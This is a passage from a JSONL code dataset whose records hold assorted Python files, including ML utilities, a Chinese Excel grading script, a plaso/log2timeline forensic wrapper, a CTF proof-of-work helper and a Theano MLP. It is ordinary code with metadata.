PRESENTATION_TYPE_SMS,\n )\n\n dict_properties = (\n 'title',\n 'presentation_type',\n )\n\n @classmethod\n def get_by_uid(cls, uid, user=None):\n \"\"\"\n Retrieves a Channel from the datastore using its UID.\n\n Must be implemented by concrete classes.\n\n :param uid: the UID of the Channel to retrieve\n :type uid: string\n :param user: the User who should have access to the desired Channel\n :type user: User\n :raises:\n DataStoreError if there was an error reading from the datastore\n :returns:\n the specified Channel; None if the specified UID does not exist\n :rtype: Channel\n \"\"\"\n\n raise NotImplementedError()\n\n @classmethod\n def find(cls, offset=0, limit=None, user=None, **search_criteria):\n \"\"\"\n Returns Channels that match the specified criteria.\n\n ``search_criteria`` for this method will (at a minimum) support:\n\n * title (partial matches)\n * presentation_type (exact matches)\n\n Must be implemented by concrete classes.\n\n :param offset:\n the offset in the list of Channels to start the return set from\n (useful for pagination purposes); if not specified, defaults to 0\n :type offset: int\n :param limit:\n the maximum number of Channels to return (useful for pagination\n purposes); if not specified, defaults to ``None``, which means no\n limit\n :type limit: int\n :param user: the User who should have access to the desired Channels\n :type user: User\n :raises:\n DataStoreError if there was an error reading from the datastore\n :rtype: list of Channels\n \"\"\"\n\n raise NotImplementedError()\n\n @classmethod\n def get_implementation(cls):\n \"\"\"\n Returns the concrete implementation of this class that is activated in\n the currently running application.\n\n :rtype: type\n \"\"\"\n\n return get_implementation('channel')\n\n def __init__(self, uid, title, presentation_type):\n self._uid = to_unicode(uid)\n self._title = to_unicode(title)\n if presentation_type not in Channel.ALL_PRESENTATION_TYPES:\n raise ValueError(\n '\"%s\" is not a valid presentation type' % (presentation_type,)\n )\n self._presentation_type = presentation_type\n\n @property\n def uid(self):\n \"\"\"\n The Unique Identifier that represents this Channel in the datastore.\n Read only.\n\n :rtype: unicode\n \"\"\"\n\n return self._uid\n\n @property\n def title(self):\n \"\"\"\n The human-readable title of the Channel.\n\n :rtype: unicode\n \"\"\"\n\n return self._title\n\n @property\n def presentation_type(self):\n \"\"\"\n The presentation type this Channel handles.\n\n :rtype: unicode\n \"\"\"\n\n return self._presentation_type\n\n def get_instruments(\n self,\n offset=0,\n limit=None,\n user=None,\n **search_criteria):\n \"\"\"\n Returns Instruments that have at least one Presentation configuration\n set up for this Channel.\n\n Must be implemented by concrete classes.\n\n :param offset:\n the offset in the list of Instruments to start the return set from\n (useful for pagination purposes); if not specified, defaults to 0\n :type offset: int\n :param limit:\n the maximum number of Instruments to return (useful for pagination\n purposes); if not specified, defaults to ``None``, which means no\n limit\n :type limit: int\n :param user: the User who should have access to the desired Instruments\n :type user: User\n :raises:\n DataStoreError if there was an error reading from the datastore\n :rtype: list of Instruments\n \"\"\"\n\n raise NotImplementedError()\n\n def get_display_name(self):\n \"\"\"\n Returns a unicode string that represents this object, suitable for use\n in human-visible places.\n\n :rtype: unicode\n \"\"\"\n\n return self.title\n\n def __repr__(self):\n return '%s(%r, %r, %r)' % (\n self.__class__.__name__,\n self.uid,\n self.title,\n self.presentation_type,\n )\n\n","sub_path":"src/rex.instrument/src/rex/instrument/interface/channel.py","file_name":"channel.py","file_ext":"py","file_size_in_byte":4984,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"218796860","text":"\"\"\"@package utils\n\nThis package implements useful functions.\n\nCopyright (c) 2020 Nhan H. Pham, Department of Statistics and Operations Research, University of North Carolina at Chapel Hill\n\nCopyright (c) 2020 Lam M. Nguyen, IBM Research, Thomas J. Watson Research Center\nYorktown Heights\n\nCopyright (c) 2020 Dzung T. Phan, IBM Research, Thomas J. Watson Research Center\nYorktown Heights\n\nCopyright (c) 2020 Phuong Ha Nguyen, Department of Electrical and Computer Engineering, University of Connecticut\n\nCopyright (c) 2020 Marten van Dijk, Department of Electrical and Computer Engineering, University of Connecticut\n\nCopyright (c) 2020 Quoc Tran-Dinh, Department of Statistics and Operations Research, University of North Carolina at Chapel Hill\nAll rights reserved.\n\nIf you found this helpful and are using it within our software please cite the following publication:\n\n* N. H. Pham, L. M. Nguyen, D. T. Phan, P. H. Nguyen, M. van Dijk and Q. Tran-Dinh, **A Hybrid Stochastic Policy Gradient Algorithm for Reinforcement Learning**, The 23rd International Conference on Artificial Intelligence and Statistics (AISTATS 2020), Palermo, Italy, 2020.\n\n\"\"\"\n\nimport numpy as np\n\ndef extract_path(paths, discount):\n for path in paths:\n p_rewards = path[\"rewards\"]\n\n returns = []\n return_so_far = 0\n for t in range(len(p_rewards) - 1, -1, -1):\n return_so_far = p_rewards[t] + discount * return_so_far\n returns.append(return_so_far)\n\n # reverse return array\n returns = np.array(returns[::-1])\n\n # add to dict\n path[\"returns\"] = returns\n\n # d_rewards_tmp = [p[\"rewards\"] for p in paths]\n \n # d_rewards_tmp = calc_discount_rewards(d_rewards_tmp, discount)\n\n observations = [p[\"observations\"] for p in paths]\n actions = [p[\"actions\"] for p in paths]\n d_rewards = [p[\"returns\"] for p in paths]\n\n # print(d_rewards[0],'\\n',d_rewards_tmp[0])\n\n return observations, actions, d_rewards\n\ndef prox_l1_norm( w, lamb ):\n \"\"\"! Compute the proximal operator of the \\f$\\ell_1\\f$ - norm\n\n \\f$ prox_{\\lambda \\|.\\|_1} = {arg\\min_x}\\left\\{\\|.\\|_1^2 + \\frac{1}{2\\lambda}\\|x - w\\|^2\\right\\} \\f$\n \n Parameters\n ---------- \n @param w : input vector\n @param lamb : penalty paramemeter\n \n Returns\n ---------- \n @retval : perform soft - thresholding on input vector\n \"\"\"\n return np.sign( w ) * np.maximum( np.abs( w ) - lamb, 0 )\n\ndef prox_l2_square(x, lbd):\n \"\"\"! Compute the proximal operator of the \\f$\\ell_2\\f$ - norm\n\n \\f$ prox_{\\lambda \\|.\\|_1} = {arg\\min_x}\\left\\{\\|.\\|_2^2 + \\frac{1}{2\\lambda}\\|x - w\\|^2\\right\\} \\f$\n \n Parameters\n ---------- \n @param w : input vector\n @param lamb : penalty paramemeter\n \n Returns\n ---------- \n @retval : perform soft - thresholding on input vector\n \"\"\"\n return (1.0 / (1.0 + lbd)) * x\n\ndef compute_snapshot_grad_est(f_compute_grad, obs, acts, rws):\n # compute policy gradient\n v_est = f_compute_grad(obs[0], acts[0], rws[0])\n for ob,ac,rw in zip(obs[1:],acts[1:],rws[1:]):\n g_i = f_compute_grad(ob, ac, rw)\n v_est = [sum(x) for x in zip(v_est,g_i)]\n v_est = [x/len(obs) for x in v_est]\n\n return v_est\n\ndef compute_hybrid_spg_est(f_compute_grad,f_compute_grad_diff,f_importance_weights,path_info_1,path_info_2,beta,v_est):\n sub_observations_1 = path_info_1['obs']\n sub_actions_1 = path_info_1['acts']\n sub_d_rewards_1 = path_info_1['rws']\n\n sub_observations_2 = path_info_2['obs']\n sub_actions_2 = path_info_2['acts']\n sub_d_rewards_2 = path_info_2['rws']\n\n iw = f_importance_weights(sub_observations_1[0],sub_actions_1[0])\n grad_diff = f_compute_grad_diff(sub_observations_1[0],sub_actions_1[0],sub_d_rewards_1[0],iw)\n u_est = f_compute_grad(sub_observations_2[0],sub_actions_2[0],sub_d_rewards_2[0])\n\n for ob_1,ac_1,rw_1,ob_2,ac_2,rw_2 in zip(sub_observations_1[1:],sub_actions_1[1:],sub_d_rewards_1[1:],\\\n sub_observations_2[1:],sub_actions_2[1:],sub_d_rewards_2[1:]):\n iw = f_importance_weights(ob_1,ac_1)\n grad_diff = [sum(x) for x in zip(grad_diff,f_compute_grad_diff(ob_1,ac_1,rw_1,iw))]\n u_est = [sum(x) for x in zip(u_est,f_compute_grad(ob_2,ac_2,rw_2))]\n\n grad_diff = [x/len(sub_observations_1) for x in grad_diff]\n u_est = [x/len(sub_observations_2) for x in u_est]\n v_est = [beta*(v + grad_d) + (1-beta) * u for v,grad_d,u in zip(v_est,grad_diff,u_est)]\n\n return v_est","sub_path":"utils/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":4535,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"368104599","text":"# -*- coding:utf-8 -*-\nimport openpyxl as op\nfrom platform import system as psys\nfrom os import system as osys,getcwd,path,remove\nimport configparser as cp\nimport datetime as dt\n\nps='\\\\' if psys()=='Windows' else '/'\n\nclass struct:\n def __init__(self):\n c=cp.ConfigParser()\n c.read(path.dirname(path.realpath(__file__))+'/config.ini',encoding='utf-8')\n self.subject=c['DEFAULT']['subject']\n self.outputFileName=c['DEFAULT']['outputFileName']\n self.templateName=c['DEFAULT']['templateName']\n self.templateSheet=c['DEFAULT']['templateSheet']\n self.correct=c['DEFAULT']['correct']\n self.title=c['DEFAULT']['title']\n\nerr=list()\n\ndef is_Chinese(ch):\n if '\\u4e00' <= ch <= '\\u9fff':\n return True\n return False\n\ndef func():\n c=struct()\n wb=op.load_workbook(c.templateName)\n ws=wb[c.templateSheet]\n wb.close()\n sid=dict()\n i='A'\n ws['A1']=c.title.format(month=dt.datetime.now().strftime(\"%m\"),day=dt.datetime.now().strftime(\"%d\"))\n for cell in ws[2]:\n sid[cell.value]=i\n i=chr(ord(i)+1)\n nid,i=dict(),0\n for name in ws[sid['姓名']]:\n i+=1\n if i<=2:\n continue\n nid[name.value]=i\n fp=getcwd()+ps+'input.txt'\n inf=open(fp,'w+')\n inf.close()\n print('''请打开%s,并将内容输入到该文件中。\n一般来说,第一行应该有一个@。\n如果数据有序号,请在@后面加一个I;\n如果数据有附加信息,请在@后面加一个C。\n(两者可同时出现,不区分大小写。如果结果为@I/@i,可省略不输入)\n如果以上皆无,第一行应该有且只有一个@。\n输入完成后,'''%fp)\n nc,ni=True,True\n if psys()==\"Windows\":\n osys(\"pause\")\n else:\n print('请在此输入任何内容并换行以继续...')\n input()\n with open(fp,'r',encoding='utf-8') as f:\n mstr=f.readline().strip()\n if mstr and mstr[0]=='@':\n mstr=mstr.upper()\n if 'C' in mstr:\n nc=False\n if 'I' in mstr:\n ni=False\n mstr=f.readline().strip()\n else:\n ni=False\n while mstr:\n try:\n if mstr=='':\n continue\n if nc and ni:\n ws['%s%d'%(sid[c.subject],nid[mstr])]=c.correct\n else:\n ns=0\n if not ni:\n ns=-1\n for i in range(0,len(mstr)):\n ch=mstr[i]\n if is_Chinese(ch):\n if ns==-1:\n ns=i\n break\n else:\n ns=0\n if not nc:\n ne=-1\n for i in range(1,len(mstr)+1):\n ch=mstr[-i]\n if is_Chinese(ch):\n if ne==-1:\n ne=-i+1\n break\n else:\n ne=len(mstr)\n ws['%s%d'%(sid[c.subject],nid[mstr[ns:ne]])]=c.correct if nc else mstr[ne:]\n pass\n except:\n err.append(mstr)\n mstr=f.readline().strip()\n if path.exists(fp):\n remove(fp)\n wb.save(c.outputFileName)\n print('文件已输出到%s'%(getcwd()+ps+c.outputFileName))\n if len(err)!=0:\n print('以下数据未能成功处理:')\n for mstr in err:\n print(mstr)\n\nif __name__=='__main__':\n try:\n func()\n except KeyboardInterrupt:\n pass\n except Exception as e:\n print('程序出错')\n print(e)\n\n if psys()==\"Windows\":\n osys('pause')\n","sub_path":"Homework/newHomework.py","file_name":"newHomework.py","file_ext":"py","file_size_in_byte":3867,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"577542327","text":"def fetch_rpm_from_url(spec, module=None):\n (package_name, _) = os.path.splitext(str(spec.rsplit('/', 1)[1]))\n package_file = tempfile.NamedTemporaryFile(prefix=package_name, suffix='.rpm', delete=False)\n module.add_cleanup_file(package_file.name)\n try:\n (rsp, info) = fetch_url(module, spec)\n if (not rsp):\n module.fail_json(msg=('Failure downloading %s, %s' % (spec, info['msg'])))\n data = rsp.read(BUFSIZE)\n while data:\n package_file.write(data)\n data = rsp.read(BUFSIZE)\n package_file.close()\n except Exception as e:\n if module:\n module.fail_json(msg=('Failure downloading %s, %s' % (spec, to_native(e))))\n else:\n raise e\n return package_file.name","sub_path":"Data Set/bug-fixing-5/f31696f77fc248d06f4fd5f3f7ca875b87aec81d--fix.py","file_name":"f31696f77fc248d06f4fd5f3f7ca875b87aec81d--fix.py","file_ext":"py","file_size_in_byte":773,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"327874030","text":"import requests\nimport csv\nfrom bs4 import BeautifulSoup\nimport re\n\nmat = open('Materias.csv', 'w')\narq = open('Soup.csv', 'r').readlines()\nn = 1\n\n# url = f'https://www.sitequevocequer.com.br/blog/page/{n}/'\n# res = requests.get('https://www.sitequevocequer.com.br/blog/')\n# res = requests.get(url)\n# soup =BeautifulSoup(res.text,'lxml')\n\n# hi = soup.select('title')\n#\n# x= soup.find_all('a')\n\n\n# limite=13\n\n\n# end = list()\n# end2 = list()\n\n# while n<=limite:\n# url = f'https://www.sitequevocequer.com.br/blog/page/{n}/'\n# # res = requests.get('https://www.sitequevocequer.com.br/blog/')\n# res = requests.get(url)\n# soup = BeautifulSoup(res.text, 'lxml')\n\n# for link in soup.find_all('a'): #pega os links da pagina\n# end.append(link.get('href'))\n\n# for link in end:\n# if link not in end2:\n# end2.append(link)\n# print(f'pagina {n} sendo sugada!!!')\n# print(f'A lista de link tem {len(end2)} valores')\n# n+=1\n\n# for v in end2:\n# arq.write('\\n'+v)\n\n\nx = 1\n\nlimite = 526\nlimit = 1\nend = list()\nend2 = list()\n\nwhile x <= limite:\n\n url = arq[x]\n res = requests.get(url)\n soup = BeautifulSoup(res.text, 'lxml')\n\n for link in soup.find_all('a'): # pega os links da pagina\n end.append(link.get('href'))\n for link in end:\n if link not in end2:\n # if 'bit.ly' in link:\n # if re.search(str(\"bit.ly\"),str(link)):\n if str('bit.ly') in str(link):\n end2.append(link)\n else:\n pass\n\n print(f'endereço{x}\\n Esta sendo sugado\\nA lista de link tem {len(end2)} valores!!!!')\n for v in end2:\n\n try:\n mat.write(f'\\nA pagina: {url} contem: {v}\\n\\n')\n except:\n print('Erro ao escrever')\n x += 1\n\n# for v in soup.find_all('a'):\n# print(v)\n\n# print(hi)\n\n\n# print(hi[0].getText())\n\n# print(soup.title.string)\n\n\n# print(soup.p)\n","sub_path":"Dracula_v2.py","file_name":"Dracula_v2.py","file_ext":"py","file_size_in_byte":1882,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"231014052","text":"\"\"\"\n MLA : machine learning algorithm\n\"\"\"\n#\nimport pandas as pd\n\n# common Model Algorithms\nfrom sklearn import svm, tree, linear_model, neighbors, naive_bayes, ensemble, discriminant_analysis, gaussian_process\nfrom xgboost import XGBClassifier\n\n#Common Model Helpers\nfrom sklearn.preprocessing import OneHotEncoder, LabelEncoder\nfrom sklearn import feature_selection\nfrom sklearn import model_selection\nfrom sklearn import metrics\n\n# visualization\nimport matplotlib.pyplot as plt\nimport matplotlib as mpl\nimport matplotlib.pylab as pylab\nimport seaborn as sns\n\nMLA = [\n # Ensemble Methods\n ensemble.AdaBoostClassifier(),\n ensemble.BaggingClassifier(),\n ensemble.ExtraTreesClassifier(),\n ensemble.GradientBoostingClassifier(),\n ensemble.RandomForestClassifier(),\n\n # Gaussian Process\n gaussian_process.GaussianProcessClassifier(),\n\n # GLM\n linear_model.LogisticRegressionCV(),\n linear_model.PassiveAggressiveClassifier(),\n linear_model.RidgeClassifierCV(),\n linear_model.SGDClassifier(),\n linear_model.Perceptron(),\n\n # Navies Bayes\n naive_bayes.BernoulliNB(),\n naive_bayes.GaussianNB(),\n\n # Nearest Neighbor\n neighbors.KNeighborsClassifier(),\n\n # SVM\n svm.SVC(probability=True),\n svm.NuSVC(probability=True),\n svm.LinearSVC(),\n\n # Tree\n tree.DecisionTreeClassifier(),\n tree.ExtraTreeClassifier(),\n\n # Discriminant Analysis\n discriminant_analysis.LinearDiscriminantAnalysis(),\n discriminant_analysis.QuadraticDiscriminantAnalysis(),\n\n # xgboost\n XGBClassifier()\n]\n\n# cv_split = model_selection.ShuffleSplit(n_splits=10, test_size=.3, train_size=.6, random_state=0)\ncv_split = model_selection.ShuffleSplit(n_splits=10, train_size=.6, test_size=.3, random_state=0)\n\nMLA_colums = [\"MLA Name\", \"MLA Parameters\", \"MLA Train Accuracy Mean\", \"MLA Test Accuracy Mean\", \"MLA Test Accuracy 3*STD\", \"MLA Time\"]\nMLA_compare = pd.DataFrame(columns=MLA_colums)\n\ndata1 = pd.read_csv(\"data/pre_processing/processed_train5.csv\")\nX = data1.drop([\"PassengerId\", \"Survived\"], axis=1).values\nY = data1[[\"Survived\"]].values\n\nMLA_predict = Y\n\nrow_index = 0\n\nfor alg in MLA:\n MLA_name = alg.__class__.__name__\n MLA_compare.loc[row_index, \"MLA Name\"] = MLA_name\n MLA_compare.loc[row_index, \"MLA Parameters\"] = str(alg.get_params())\n\n cv_results = model_selection.cross_validate(alg, X, Y, cv=cv_split, return_train_score=True)\n\n MLA_compare.loc[row_index, \"MLA Time\"] = cv_results[\"fit_time\"].mean()\n MLA_compare.loc[row_index, \"MLA Train Accuracy Mean\"] = cv_results[\"train_score\"].mean()\n MLA_compare.loc[row_index, \"MLA Test Accuracy Mean\"] = cv_results[\"test_score\"].mean()\n MLA_compare.loc[row_index, \"MLA Test Accuracy 3*STD\"] = cv_results[\"test_score\"].std() * 3\n \n #alg.fit(X, Y)\n #MLA_predict[MLA_name] = alg.predict(X)\n\n row_index += 1\n\nMLA_compare.sort_values(by=['MLA Test Accuracy Mean'], ascending=False, inplace=True)\nprint(MLA_compare)\nsns.barplot(x='MLA Test Accuracy Mean', y='MLA Name', data=MLA_compare, color='m')\nplt.show()","sub_path":"mla.py","file_name":"mla.py","file_ext":"py","file_size_in_byte":3051,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"474487415","text":"from pyramid.view import (\n view_config,\n view_defaults\n)\n\nimport mysql_config\n\n\n@view_defaults(renderer='mysql/mysql.html')\nclass MySqlViews:\n def __init__(self, request):\n self.request = request\n\n @view_config(route_name='mysql')\n def home(self):\n return {\n \"mysql\": mysql_config.get_mysql_config(),\n \"content_block_title\": \"MySQL settings\"\n }\n\n @view_config(route_name='mysql_conf', renderer='json')\n def mysql_conf(self):\n return {\n \"config\": mysql_config.get_mysql_config_text()\n }\n\n @view_config(route_name='mysql_conf_save', renderer='json')\n def mysql_conf_save(self):\n if \"config\" in self.request.POST:\n return {\n \"result\": mysql_config.save_mysql_config(self.request.POST[\"config\"])\n }\n else:\n return {\n \"result\": \"Error: incorrect data!\"\n }\n\n","sub_path":"rigery_panel/modules/mysql/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":936,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"111561511","text":"fileObj = open('text')\r\n#print(fileObj.read()) # prints all lines, line by line\r\n#print(fileObj.read(2)) # prints the first two line in the file\r\n#print(fileObj.readline()) # prints sinle line\r\n#print(fileObj.readline())\r\n#fileObj.close()\r\n\r\n# program to read line by line using readLine method\r\n#line = fileObj.readline()\r\n#while line != \"\":\r\n# print(line)\r\n# line = fileObj.readline()\r\n\r\nlines = fileObj.readlines() # arranges all the lines in the form list\r\nfor l in lines:\r\n print(l)\r\nprint(lines[3])\r\nfileObj.close()\r\n\r\nwith open('text', 'r') as reader:\r\n content = reader.readlines()\r\n reversed(content)\r\n with open('text', 'w') as writer:\r\n for line in reversed(content):\r\n writer.write(line)","sub_path":"PythonBasics/DemoReadWrite.py","file_name":"DemoReadWrite.py","file_ext":"py","file_size_in_byte":736,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"334526629","text":"import os\nimport glob\nimport pandas as pd\nimport subprocess as sp\nimport ColorTextWriter\n\nclass FeatureCounter:\n\n def __init__(self, home_dir, input_dir, gfeature, stranded, feature_dir, feature_file, extensions, seq_method):\n self.home_dir = home_dir\n self.input_dir = input_dir\n self.gfeature = gfeature\n self.stranded = stranded\n self.feature_dir = feature_dir\n self.feature_file = feature_file\n self.extensions = extensions\n self.seq_method = seq_method\n\n def feature(self):\n\n bam_list = sorted(glob.glob(self.input_dir + '*.bam'))\n\n ctw = ColorTextWriter.ColorTextWriter()\n\n print(ctw.CBEIGE + ctw.CBOLD + 'Feature counting started ...' + ctw.CEND + '\\n')\n\n i = 0\n while i < len(self.gfeature):\n\n outdir = os.path.join(self.home_dir, 'featureCounts' + '_' + self.gfeature[i])\n if not os.path.isdir(outdir): os.mkdir(outdir)\n\n print('\\n' + 'Quantifying ' + self.gfeature[i] + 's ...' + '\\n')\n\n command = [\n 'featureCounts -t', self.gfeature[i],\n '-F GTF -g gene_name -O -M -s', self.stranded\n ]\n\n if self.seq_method == 'paired': command.extend(['-p -B -C'])\n\n command.extend([\n '-a', self.feature_dir + self.feature_file.split('.gz')[0],\n '-o', outdir + '/' + self.gfeature[i] + self.extensions[3],\n ' '.join([self.input_dir + '{0}'.format(j.split(self.input_dir)[1]) for j in bam_list])\n ])\n\n command = ' '.join(command)\n sp.check_call(command, shell=True)\n\n ### Manipulating the FeatureCounts output\n data = pd.read_csv(outdir + '/' + self.gfeature[i] + self.extensions[3], sep='\\t', header=0, index_col=0, skiprows=1)\n\n data = data.drop(data.iloc[:, 0:4], axis=1)\n\n data.to_csv(outdir + '/' + self.gfeature[i] + '_DESeq2_Input' + self.extensions[3], sep='\\t')\n\n i = i + 1\n\n if i == len(self.gfeature):\n print('\\n' + ctw.CBEIGE + ctw.CBOLD + 'Feature counting done!!!' + ctw.CEND + '\\n')","sub_path":"scripts/FeatureCounter.py","file_name":"FeatureCounter.py","file_ext":"py","file_size_in_byte":2148,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"266686909","text":"from setuptools import setup,find_packages\r\n\r\nwith open('readme.md', 'r') as readme:\r\n long_desc = readme.read()\r\n\r\nsetup(\r\n name = 'wiktionaryparser-ml',\r\n version = '0.0.1',\r\n description = 'A tool to parse word data from wiktionary.com into a JSON object. Based on wiktionary parser by Suyash Behera',\r\n long_description = long_desc,\r\n long_description_content_type='text/markdown',\r\n packages = ['', 'tests', 'utils'],\r\n data_files=[('testOutput', ['tests/testOutput.json']), ('readme', ['readme.md']), ('requirements', ['requirements.txt'])],\r\n author = 'Maksym Kozlenko',\r\n author_email = 'max@kozlenko.info',\r\n url = 'https://github.com/Maxim75/WiktionaryParser', \r\n download_url = 'https://github.com/Maxim75/WiktionaryParser/archive/master.zip', \r\n keywords = ['Parser', 'Wiktionary'],\r\n install_requires = ['beautifulsoup4','requests'],\r\n classifiers=[\r\n 'Development Status :: 5 - Production/Stable',\r\n 'License :: OSI Approved :: MIT License',\r\n ],\r\n)","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":983,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"540334310","text":"#!/usr/bin/python3\n\nimport base64\nimport hashlib\nimport os\nimport sys\n\ni = 0\n\ndef pow(target):\n global i\n while True:\n m = hashlib.md5()\n m.update(str(i).encode())\n h = m.hexdigest()\n if h[:6] == target:\n return i\n i += 1\n\nif __name__ == '__main__':\n pow()\n","sub_path":"crypto/des/out-of-the-box/pow.py","file_name":"pow.py","file_ext":"py","file_size_in_byte":312,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"553007310","text":"#clamscan /home/work/NAS/usb -r -i --move=/home/work/NAS/clamscan\n\nfrom Forensic_function.global_function import *\nfrom global_variable import *\nfrom start_client_linux import sendMessageTopic\n\n\ndef log2timeline(data):\n directory_image = data.get('directory_root') + '/image/image.E01'\n directory = data.get('directory_root')\n\n commandName = 'log2timeline.py'\n directory_output = directory + '/' + commandName.split('.')[0] + '/all.plaso'\n command = commandName + ' ' + directory_output + ' ' + directory_image + ' --partition all'\n #sudo log2timeline.py /home/work/NAS/Kunde/test.plaso /home/work/NAS/Kunde/mount/ewf1 --partition all\n\n commandListSudoDokumentation(command, directory)\n\ndef plaso(data):\n directory = data.get('directory_root')\n directory_image = directory + '/' + 'log2timeline' + '/all.plaso '\n\n commandName = 'psort.py'\n\n directory_output = directory + '/' + commandName.split('.')[0] + '/datei.csv'\n #clamscan /home/work/NAS/Kunde/usb -r -i --copy=/home/work/NAS/Kunde/clamscan\n command = commandName + ' ' + directory_image + ' -w' + directory_output\n #foremost -o /home/work/Desktop/Tipp -i /home/work/NAS/Kunde/image/image.E01 -T\n #log2timeline /home/work/NAS/Kunde/log2timeline /home/work/NAS/Kunde/image/image.E01log\n\n commandListSudoDokumentation(command, directory)\n\n\n\ndef timeline(data):\n print('sechster Schritt begonnen')\n log2timeline(data)\n plaso(data)\n\n print('sechser Schritt fertig')\n\n routing_key = routingkeysNachbedingung.get('Timeline') # Nach welchen Kritereien zu Warteschlange geroutet wird\n # Wird Nachricht benötigt???\n sendMessageTopic(routing_key, data)\n\n\nif __name__ == \"__main__\" :\n timeline(DATA)","sub_path":"Forensic_function/Linux/plaso.py","file_name":"plaso.py","file_ext":"py","file_size_in_byte":1722,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"429768565","text":"#!/usr/bin/env python\n\n\"\"\"\nLasagne implementation of CIFAR-10 examples from \"Deep Residual Learning for Image Recognition\" (http://arxiv.org/abs/1512.03385)\nCheck the accompanying files for pretrained models. The 32-layer network (n=5), achieves a validation error of 7.42%, \nwhile the 56-layer network (n=9) achieves error of 6.75%, which is roughly equivalent to the examples in the paper.\n\"\"\"\n\nfrom __future__ import print_function\nfrom __future__ import division\n\nimport sys\nimport os\nimport time\nimport string\nimport random\nimport pickle\n\nimport numpy as np\nimport scipy.sparse as sp\nimport theano\nimport theano.tensor as T\nfrom theano import sparse\n#import lasagne\nfrom cLearn_utils import *\nimport matplotlib.pyplot as plt\n\nfrom sklearn.datasets import fetch_20newsgroups\nfrom sklearn.datasets import fetch_rcv1\nfrom sklearn.feature_extraction.text import TfidfVectorizer\nfrom sklearn.feature_extraction.text import HashingVectorizer\nfrom sklearn.feature_selection import SelectKBest, chi2\n\n# for the larger networks (n>=9), we need to adjust pythons recursion limit\nsys.setrecursionlimit(10000)\n\n# ##################### Load data from CIFAR-10 dataset #######################\n# this code assumes the cifar dataset from 'https://www.cs.toronto.edu/~kriz/cifar-10-python.tar.gz'\n# has been extracted in current working directory\n\n# ##################### Build the neural network model #######################\n\n#from lasagne.layers import Conv2DLayer as ConvLayer\n# from lasagne.layers.dnn import Conv2DDNNLayer as ConvLayer\n# from lasagne.layers import ElemwiseSumLayer\n# from lasagne.layers import InputLayer\n# from lasagne.layers import DenseLayer\n# from lasagne.layers import GlobalPoolLayer\n# from lasagne.layers import PadLayer\n# from lasagne.layers import ExpressionLayer\n# from lasagne.layers import NonlinearityLayer\n# from lasagne.layers import FlattenLayer\n# from lasagne.nonlinearities import softmax, rectify\n# from lasagne.layers import batch_norm\n\nclass HiddenLayer(object):\n def __init__(self, rng, input, n_in, n_out, W=None, b=None, activation = T.tanh, inputIsSparse=True):\n \"\"\"\n Typical hidden layer of a MLP: units are fully-connected and have\n sigmoidal activation function. Weight matrix W is of shape (n_in,n_out)\n and the bias vector b is of shape (n_out,).\n\n NOTE : The nonlinearity used here is tanh\n\n Hidden unit activation is given by: tanh(dot(input,W) + b)\n\n :type rng: np.random.RandomState\n :param rng: a random number generator used to initialize weights\n\n :type input: theano.tensor.dmatrix\n :param input: a symbolic tensor of shape (n_examples, n_in)\n\n :type n_in: int\n :param n_in: dimensionality of input\n\n :type n_out: int\n :param n_out: number of hidden units\n\n :type activation: theano.Op or function\n :param activation: Non linearity to be applied in the hidden\n layer\n\n \"\"\"\n self.input = input\n # if inputIsSparse:\n # activation = sparse.tanh\n # else:\n # activation = T.tanh\n\n # `W` is initialized with `W_values` which is uniformely sampled\n # from sqrt(-6./(n_in+n_hidden)) and sqrt(6./(n_in+n_hidden))\n # for tanh activation function\n # the output of uniform if converted using asarray to dtype\n # theano.config.floatX so that the code is runable on GPU\n # Note : optimal initialization of weights is dependent on the\n # activation function used (among other things).\n # For example, results presented in [Xavier10] suggest that you\n # should use 4 times larger initial weights for sigmoid\n # compared to tanh\n # We have no info for other function, so we use the same as\n # tanh.\n if W is None:\n W_values = np.asarray(rng.uniform(\n low=-np.sqrt(6. / (n_in + n_out)),\n high=np.sqrt(6. / (n_in + n_out)),\n size=(n_in, n_out)), dtype=theano.config.floatX)\n if activation == theano.tensor.nnet.sigmoid:\n W_values *= 4\n\n W = theano.shared(value=W_values, name='W', borrow=True)\n\n if b is None:\n b_values = np.zeros((n_out,), dtype=theano.config.floatX)\n b = theano.shared(value=b_values, name='b', borrow=True)\n\n self.W = W\n self.b = b\n\n if inputIsSparse:\n lin_output = sparse.structured_dot(input, self.W) + self.b\n else:\n lin_output = T.dot(input, self.W) + self.b\n\n # parameters of the model\n self.output = (lin_output if activation is None\n else activation(lin_output)) \n self.params = [self.W, self.b]\n\nclass LogisticRegression(object):\n \"\"\"Multi-class Logistic Regression Class\n\n The logistic regression is fully described by a weight matrix :math:`W`\n and bias vector :math:`b`. Classification is done by projecting data\n points onto a set of hyperplanes, the distance to which is used to\n determine a class membership probability.\n \"\"\"\n\n def __init__(self, input, n_in, n_out, inputIsSparse=True):\n \"\"\" Initialize the parameters of the logistic regression\n\n :type input: theano.tensor.TensorType\n :param input: symbolic variable that describes the input of the\n architecture (one minibatch)\n\n :type n_in: int\n :param n_in: number of input units, the dimension of the space in\n which the datapoints lie\n\n :type n_out: int\n :param n_out: number of output units, the dimension of the space in\n which the labels lie\n\n \"\"\"\n # start-snippet-1\n # initialize with 0 the weights W as a matrix of shape (n_in, n_out)\n self.W = theano.shared(\n value=np.zeros(\n (n_in, n_out),\n 